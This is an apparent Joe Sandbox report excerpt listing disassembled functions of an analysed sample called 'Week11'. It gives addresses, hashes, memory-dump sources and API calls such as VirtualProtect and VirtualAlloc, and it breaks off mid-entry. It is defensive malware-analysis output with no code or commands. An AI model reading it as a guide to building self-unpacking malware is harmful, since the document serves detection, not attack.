                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cfb4824c826509ea9393debc8c822bc8888ecb46761e71fb644ac920368247d
                                • Instruction ID: b982d31688b992a9a10665792c37709b97ba75409b13f9ffc5d7cba2d9dc1231
                                • Opcode Fuzzy Hash: 9cfb4824c826509ea9393debc8c822bc8888ecb46761e71fb644ac920368247d
                                • Instruction Fuzzy Hash: 5B2181B1D041699FEB28CF15DD44AEBB778EB89310F1041FAD40E96641D6349EC68F61
                                Function 00407420 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 1c2a1999c9fd57952d49f1073d23a42f1ced81199c5832538b3697fa2647a165
                                • Instruction ID: f0b75b4441c9d37c42d0ae9f9f43850f7ba2223918dbdec60047f74229b53538
                                • Opcode Fuzzy Hash: 1c2a1999c9fd57952d49f1073d23a42f1ced81199c5832538b3697fa2647a165
                                • Instruction Fuzzy Hash: 6521A8B1D0862C9BDB208A51DC91AFA7B74EB51314F1442FBD84AA6681D2396EC18F93
                                Function 00407150 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 051fae7594ffcc9bdc3f335987129d4eb93f07465e64b3f19de7ed127006d00b
                                • Instruction ID: e5dd3994f6b32ac1ff6ed4b8a0999b97d5aa9ab670d0f106e4f6901be4323d05
                                • Opcode Fuzzy Hash: 051fae7594ffcc9bdc3f335987129d4eb93f07465e64b3f19de7ed127006d00b
                                • Instruction Fuzzy Hash: B71196B1E0921CABE7208B10CC41BEBB778EB51304F1441FBE50966680D6396EC19E53
                                Function 0040694C Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: be11e4526977f0b0f227e85b99da83f8957ec219c10f3e679c5ee91d3b4100c0
                                • Instruction ID: 4925f64d2496caee3e557219cd1a7a6ec54885f7934185fd1c6884df780fe6af
                                • Opcode Fuzzy Hash: be11e4526977f0b0f227e85b99da83f8957ec219c10f3e679c5ee91d3b4100c0
                                • Instruction Fuzzy Hash: 10012BF1D0C314AFD3109B60CC529EB3B38DF51300F1441BFE54A66581D1396E568BA3
                                Function 00420172 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 485a32b547078cfbe831a0a9ade745c6337b17f025fc704b3b1125bf43b7976e
                                • Instruction ID: cd5d031751ea870a61a7d4100524778f6358ef88cd4e2a1c594936d3688603b0
                                • Opcode Fuzzy Hash: 485a32b547078cfbe831a0a9ade745c6337b17f025fc704b3b1125bf43b7976e
                                • Instruction Fuzzy Hash: 6A117F70A04269DFDB25CB65EC94AEAB7B0AB45300F2040EFD149A7242DA745ED5CF11
                                Function 0040695C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 855f5e80f9541c96a3a2d822a5a811061b195c471eb266dac1a6c7715dd1f34c
                                • Instruction ID: 274cb89beb1a3e6ab73d69a877b76f261775b139f2f77444169076f95774e751
                                • Opcode Fuzzy Hash: 855f5e80f9541c96a3a2d822a5a811061b195c471eb266dac1a6c7715dd1f34c
                                • Instruction Fuzzy Hash: 7401D6F1E18214ABE7108A50DC82FEB7B78EB55304F1441BBE90E61680D13D6E854BA3
                                Function 004071E8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: d2e99ac6256d0a7d39fccb270f2fc7ac41bd82ed4ad80516182ddf7d2959af27
                                • Instruction ID: 597c9013eb682f45a94fe761983bdc02ce4bdebba091caedd36097ed53851130
                                • Opcode Fuzzy Hash: d2e99ac6256d0a7d39fccb270f2fc7ac41bd82ed4ad80516182ddf7d2959af27
                                • Instruction Fuzzy Hash: E20144F1E18218ABD7208A50DC81EEB7B78EB55304F1441FBE94E62680D5396F818FA3
                                Function 004071B6 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b90901113764cd49bbeb5faf1b2e5cfe7156d612a9053401008c56ac3d088e0d
                                • Instruction ID: 6e593ad78f11266b3d0d5a0e6c0c9e800c832fa8ae5a062fae9fe734989720c2
                                • Opcode Fuzzy Hash: b90901113764cd49bbeb5faf1b2e5cfe7156d612a9053401008c56ac3d088e0d
                                • Instruction Fuzzy Hash: 100148F1E18218ABD7208A50DC41EEB7B78DB55304F1441FBE94EA1680D5396F818FA3
                                Function 0040720D Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 51f71612e2857585a5d4d5d8945cf98c33817d09fb682abd9b2d9f92641cf950
                                • Instruction ID: f12e0ca71b6847934ea0494068f75b96b62ed845ec6b8c07d59b42710ea1b0c8
                                • Opcode Fuzzy Hash: 51f71612e2857585a5d4d5d8945cf98c33817d09fb682abd9b2d9f92641cf950
                                • Instruction Fuzzy Hash: A80144F1E18218ABD7208A50DC91EEB7B78EB55304F1441FBE94E62680D5396F818FA3
                                Function 004201CB Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 7a9ea11f322c8a829551b9b54ecbe6dd23da0f0eb2d9c6ba193f36ba04a269a3
                                • Instruction ID: 544e10bf16d661ead35c34841ea820961fc07b711cd9a117e8f26bd388227f72
                                • Opcode Fuzzy Hash: 7a9ea11f322c8a829551b9b54ecbe6dd23da0f0eb2d9c6ba193f36ba04a269a3
                                • Instruction Fuzzy Hash: 54016970E04669CBEB24CB95EC84AEAF7B1BB88300F1081EBD05DA7241CA745EC1CF15
                                Function 004074C4 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004074F1
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 55a8861f1dcad2f356bc3d61f64511ec5ac83e40df81549a46bac06715186c02
                                • Instruction ID: 25211521b3aac59db9137579fb048d154c1f79c3e79b1b3f0576d00875a9e760
                                • Opcode Fuzzy Hash: 55a8861f1dcad2f356bc3d61f64511ec5ac83e40df81549a46bac06715186c02
                                • Instruction Fuzzy Hash: 57F037F1E14528ABD710CA95CC51FE6B7BCEF55304F0051EBE54AE2680D139AF818F91
                                Function 031FC670 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.2483016683.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                • Associated: 00000001.00000002.2483016683.00000000038AF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000001.00000002.2483016683.00000000038B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000001.00000002.2483016683.00000000038CF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000001.00000002.2483016683.00000000038D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_31a0000_Week11.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 85b07341f977adfd1331a972d0bd069f00081ffb41b5367fe339be9e9d3b190f
                                • Instruction ID: 933be8071f0d6d3a30d3a4238a8b18ece7488d0241ab979ff6528888495a31a8
                                • Opcode Fuzzy Hash: 85b07341f977adfd1331a972d0bd069f00081ffb41b5367fe339be9e9d3b190f
                                • Instruction Fuzzy Hash: 82E09275505B40CFCB15DF28C2C5606BBF0EB88A00F0485A8DE098F70AE774EE10DAD2
                                Function 0042026D Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: c91b693d5b86d2ae11cf6c47b3df95c23ceaa6344db94eb5af2c9422f4b8f2d4
                                • Instruction ID: b19b272ba7b8afd569ed7e5b3ccce1395f6120d56c9f6e3fe858b590bc848e8d
                                • Opcode Fuzzy Hash: c91b693d5b86d2ae11cf6c47b3df95c23ceaa6344db94eb5af2c9422f4b8f2d4
                                • Instruction Fuzzy Hash: C29002A095C21786D76C1B60490C56A67345B45201F1105A9900660441467AAA415917
                                Function 0041CD15 Relevance: 1.5, APIs: 1, Instructions: 240COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63bc6c53ace1f96f468e36bb05d3ea0da271d94e9b453ac4716fbbf942ad69cd
                                • Instruction ID: 2182a2bc2951b1d0c05ec37bfccbb6c8ce83d6ef750507758993ef2868f7758a
                                • Opcode Fuzzy Hash: 63bc6c53ace1f96f468e36bb05d3ea0da271d94e9b453ac4716fbbf942ad69cd
                                • Instruction Fuzzy Hash: 5BB13CB5D412289FEB24CB04CD90BEAB7B5AB88314F1081EAD80D67340D639AFD2CF45
                                Function 0041D096 Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: aa7e30c676aceae8454a2925895b9f5c4b08368b89e8b5c03fe791a78a9e317b
                                • Instruction ID: 2c36e2ef7949768e12a41f281801e4518b13919899cc75e126bbf136d0b10824
                                • Opcode Fuzzy Hash: aa7e30c676aceae8454a2925895b9f5c4b08368b89e8b5c03fe791a78a9e317b
                                • Instruction Fuzzy Hash: 1F61E2F2D042249FE7248A14DC85BEBBB78EB85314F1481FAD80D56640DA3D9EC1CE56
                                Function 0041D130 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 39ff5318d904d516bc369f7d4827446bc9ba78b461e458f8c4452cc7e08be521
                                • Instruction ID: 3433568bdd03d9e58387906f7710b1891c9d69a8965d2e77df8ce32132d6582c
                                • Opcode Fuzzy Hash: 39ff5318d904d516bc369f7d4827446bc9ba78b461e458f8c4452cc7e08be521
                                • Instruction Fuzzy Hash: 5A51C0F2D042249FE7648A14DC95BEABB74EB84314F1481FAD80E16680DA3C9FC2CF56
                                Function 0041D1C0 Relevance: 1.4, APIs: 1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 0467bd9a255d1a34fee10fea58436218394323cdcf1befe17efbfd0023b53e75
                                • Instruction ID: c882dc5e11c2c7d98907ed4a7ac6dc61bef33483b0425c8da7a57d6d56d4f739
                                • Opcode Fuzzy Hash: 0467bd9a255d1a34fee10fea58436218394323cdcf1befe17efbfd0023b53e75
                                • Instruction Fuzzy Hash: 7441DDF1D042249FEB608B18DC94BEABB74AF80314F2441FAD50D57240DA38AEC2CF96
                                Function 0041D75C Relevance: 1.3, APIs: 1, Instructions: 90memoryCOMMON
                                Download Yara Rule
                                APIs
